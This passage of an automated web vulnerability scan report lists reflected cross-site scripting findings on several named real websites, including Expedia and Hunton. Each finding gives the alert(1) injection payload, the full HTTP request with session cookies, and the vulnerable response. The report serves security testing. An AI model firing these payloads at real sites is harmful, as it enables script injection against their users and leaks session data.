Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; PHPSESSID=6fd5a07363603c0a3f4685bb1fb4e9b2; TSa27990=d77c9a2ab2f3f328d9ee79ee1dcd6b0b3a05433071c0aed34dc4432a9c5eca8583c4cdbd; WT_FPC=id=227919100c685f30f311304725152629:lv=1304725177227:ss=1304725152629; s_nr=1304725179971; s_lv=1304725179971; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:40:25 GMT
X-Powered-By: PHP/4.4.2
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:40:25 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Set-Cookie: TSa27990=f83cff2dc826eeb8b7b7b1111afdbdaf3a05433071c0aed34dc444639c5eca8583c4cdbd; Path=/
Content-Length: 23235

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Businesses</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equi
...[SNIP]...
<img_src/a_onerror/alert(1)>eafdbdd941c';">
                           FOR BUSINESSES7DB69<IMG SRC=A ONERROR=ALERT(1)>EAFDBDD941C
                       </div>
...[SNIP]...

5.120. http://www.dominionenterprises.com/main/do/businesses/id/13/category/For%20Businesses [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dominionenterprises.com
Path:   /main/do/businesses/id/13/category/For%20Businesses

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bde62"><a>f053602bd88 was submitted in the REST URL parameter 7. This input was echoed as bde62\"><a>f053602bd88 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /main/do/businesses/id/13/category/For%20Businessesbde62"><a>f053602bd88 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.dominionenterprises.com/main/do/For_Businesses
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; PHPSESSID=6fd5a07363603c0a3f4685bb1fb4e9b2; TSa27990=d77c9a2ab2f3f328d9ee79ee1dcd6b0b3a05433071c0aed34dc4432a9c5eca8583c4cdbd; WT_FPC=id=227919100c685f30f311304725152629:lv=1304725177227:ss=1304725152629; s_nr=1304725179971; s_lv=1304725179971; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:40:19 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:40:19 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 23191

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Businesses</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equi
...[SNIP]...
<div class="secondary_nav_item" style=" color:#000000; font-size:12px; font-weight:bold; padding-left:18px;" onclick="window.location.href='http://www.dominionenterprises.com/main/do/For_Businessesbde62\"><a>f053602bd88';">
...[SNIP]...

5.121. http://www.expedia.com/pub/agent.dll [date1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The value of the date1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d43e'%3balert(1)//b4e195f70d4 was submitted in the date1 parameter. This input was echoed as 5d43e';alert(1)//b4e195f70d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=5d43e'%3balert(1)//b4e195f70d4&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104; srvys=v.1%2C2%2C0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:38:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX0135D23A61$F4$B5202000V$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$38zo$D7wYd$94$82$AB$89$FB!e02000`125; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819498`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 109469

<!-- srvpush1 15:38:22(:749) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
t.value=d;
   f.rfrr.value=r;
   f.frtp.value=t;
   f.fcqp.value=q
   f.submit();
   }
   
   function SubmitRdat(q,d,t)
   {
   ResetFltWiz();
   f.qscr.value='flxc';
   f.mnth.value='5/1/2011';
   f.ddat.value='5d43e';alert(1)//b4e195f70d4';
   f.fcqp.value=q;
   f.rdat.value=d;
   if(q)
   f.rfrr.value="-22530";
   else
   f.rfrr.value="-22531";
   f.frtp.value=t;
   f.submit();
   }
   function StartOver()
   {
   f.subm.value= '';
   f.qscr.value
...[SNIP]...

5.122. https://www.expedia.com/pub/agent.dll [selc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The value of the selc request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 83116%3balert(1)//53dd1085a0b was submitted in the selc parameter. This input was echoed as 83116;alert(1)//53dd1085a0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pub/agent.dll?qscr=logi&ussl=1&subl=0&lmde=256&selc=383116%3balert(1)//53dd1085a0b&rfrr=-54397&zz=1304739868950 HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=litn&&chms=114164&rfrr=-54397&zz=1304739862204
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; s1=`0`minfo=v.5,EX01068F4DDA$F0$24$DD$0C$3E$0C$2F$1E$C5mR$39$18$13mj$26X$82$16u$F6$EC$5F$9E$C2$5C$C2$27$34$5B$7D$FC$35$F4$0D$2C$8E$21E6L$A4RS$B1$CF9`accttype=v.2,8,1,EX01191EC1D2$F0$24$DD$0C$23$0C$37$1E$CDmZ$39$19$14m$60$26X$83$17$7C$F4$DE$5F$9E`user=v.8,0,EX01CED44CE7p$B7203000$8B$27$E96$B8$60$9D$0D$B8$60$9D$0D$B8$60$9D$0D10001000$1E810$2302!50$9F9o$98X!2$3F$BC$D6$EF$B2u!e02000`378; p1=`gacct=v.1,1,215819496`tpid=v.1,1`group=v.1,0`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`adinf=v.1,215819505|999|1|874F787A276C|||`141

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:51:25 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 97453


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
(i==c&&ef)Foci(ef);
   }
   g_currSel=c;
   }
   }
   
   function SHErr(c)
   {
   var e=getObj("choice1errorid");
   if(e)e.style.display=(1!=c)?"none":"block";
   }
   function SelOptOnLoad()
   {
   selectOne(383116;alert(1)//53dd1085a0b);
   
   }AddLoadFn("SelOptOnLoad()");
//-->
...[SNIP]...

5.123. http://www.ezflexplan.com/navigation/frameset.asp [content parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/frameset.asp

Issue detail

The value of the content request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e5ba"><script>alert(1)</script>b96358f5505 was submitted in the content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /navigation/frameset.asp?id=lbmc&email=tmangrum%40lbmc%2Ecom&content=4e5ba"><script>alert(1)</script>b96358f5505 HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/lbmc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 962
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan</title>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<frameset border="0" fr
...[SNIP]...
<frame name="leftnav" src="/ContentPages/nav_4e5ba"><script>alert(1)</script>b96358f5505" marginwidth="0" marginheight="0"
scrolling="auto" frameborder="no">
...[SNIP]...

5.124. http://www.ezflexplan.com/navigation/frameset.asp [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/frameset.asp

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1212"><script>alert(1)</script>9703c6d326e was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /navigation/frameset.asp?id=lbmc&email=d1212"><script>alert(1)</script>9703c6d326e&content=employers%2Ehtml HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/lbmc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 866
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan</title>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<frameset border="0" fr
...[SNIP]...
<frame name
src="/navigation/menu.asp?id=lbmc&amp;email=d1212"><script>alert(1)</script>9703c6d326e&amp;content=employers%2Ehtml"
marginwidth="0" marginheight="0" scrolling="no" frameborder="no"
style="text-align: Left">
...[SNIP]...

5.125. http://www.ezflexplan.com/navigation/frameset.asp [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/frameset.asp

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 113a5"><script>alert(1)</script>cc1a308a602 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /navigation/frameset.asp?id=113a5"><script>alert(1)</script>cc1a308a602&email=tmangrum%40lbmc%2Ecom&content=employers%2Ehtml HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/lbmc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 892
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan</title>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<frameset border="0" fr
...[SNIP]...
<frame name
src="/navigation/menu.asp?id=113a5"><script>alert(1)</script>cc1a308a602&amp;email=tmangrum@lbmc.com&amp;content=employers%2Ehtml"
marginwidth="0" marginheight="0" scrolling="no" frameborder="no"
style="text-align: Left">
...[SNIP]...

5.126. http://www.ezflexplan.com/navigation/menu.asp [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/menu.asp

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7284e"><script>alert(1)</script>0b95bf251de was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /navigation/menu.asp?id=lbmc7284e"><script>alert(1)</script>0b95bf251de&email=tmangrum@lbmc.com&content=employers%2Ehtml HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/navigation/frameset.asp?id=lbmc&email=tmangrum%40lbmc%2Ecom&content=employers%2Ehtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3118
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan Menu</title>
<script LANGUAGE="JavaScript">


//HoverCraft MouseOver Script


if (document.images)


{


var ImageDirectory = "../
...[SNIP]...
<a href="/navigation/contact_us.asp?id=lbmc7284e"><script>alert(1)</script>0b95bf251de&email=tmangrum%40lbmc%2Ecom&content=contact_us.asp"
onclick="parent.frames[1].location='/ContentPages/nav_contact_us.html'"
target="mainbody" onmouseover="HoverCraft('Image3', Image3On.src);"
onmou
...[SNIP]...

5.127. http://www.horseracingnation.com/polls/current/kentucky_derby_2011_contenders [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.horseracingnation.com
Path:   /polls/current/kentucky_derby_2011_contenders

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4b18"style%3d"x%3aexpression(alert(1))"faaebfffd82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e4b18"style="x:expression(alert(1))"faaebfffd82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /polls/current/kentucky_derby_2011_contenders?e4b18"style%3d"x%3aexpression(alert(1))"faaebfffd82=1 HTTP/1.1
Host: www.horseracingnation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 07 May 2011 20:46:15 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 283129


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_ctl00_MasterPageHTMLTag" xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="/login.aspx?ReturnUrl=/polls/current/kentucky_derby_2011_contenders?e4b18"style="x:expression(alert(1))"faaebfffd82=1" id="ctl00_ctl00_uxLoginCtrl_uxLoginView_loginlink" class="login-popup-link">
...[SNIP]...

5.128. http://www.horseracingnation.com/probables/probables.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.horseracingnation.com
Path:   /probables/probables.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20fe5"><script>alert(1)</script>f0627898df7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /probables/probables.aspx?20fe5"><script>alert(1)</script>f0627898df7=1 HTTP/1.1
Host: www.horseracingnation.com
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/polls/current/kentucky_derby_2011_contenders
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=ab4ad5e220ff72e6:T=1304800633:S=ALNI_MZcIMcQlkcHFyO62ajydfCFp96nmA; __utmz=187249457.1304818652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=187249457.1073006542.1304818631.1304818631.1304818631.1; __utmc=187249457; __utmb=187249457.1.10.1304818631

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 07 May 2011 20:48:35 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 934409


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_MasterPageHTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml
...[SNIP]...
<a href="/login.aspx?ReturnUrl=/probables/probables.aspx?20fe5"><script>alert(1)</script>f0627898df7=1" id="ctl00_uxLoginCtrl_uxLoginView_loginlink" class="login-popup-link">
...[SNIP]...

5.129. http://www.hunton.com/aboutus/uniGC.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /aboutus/uniGC.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b3304<script>alert(1)</script>126556c9ed9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutus/uniGC.aspx?xpST=AboutUs&b3304<script>alert(1)</script>126556c9ed9=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.3.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:42:25 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1844; path=/
Set-Cookie: PortletId=5981402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48974


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/aboutus/uniGC.aspx?xpST=AboutUs&b3304<script>alert(1)</script>126556c9ed9=1&pdf=yes</div>
...[SNIP]...

5.130. http://www.hunton.com/alan_kailer/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /alan_kailer/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d7874<script>alert(1)</script>67ed776ea04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alan_kailer/?d7874<script>alert(1)</script>67ed776ea04=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
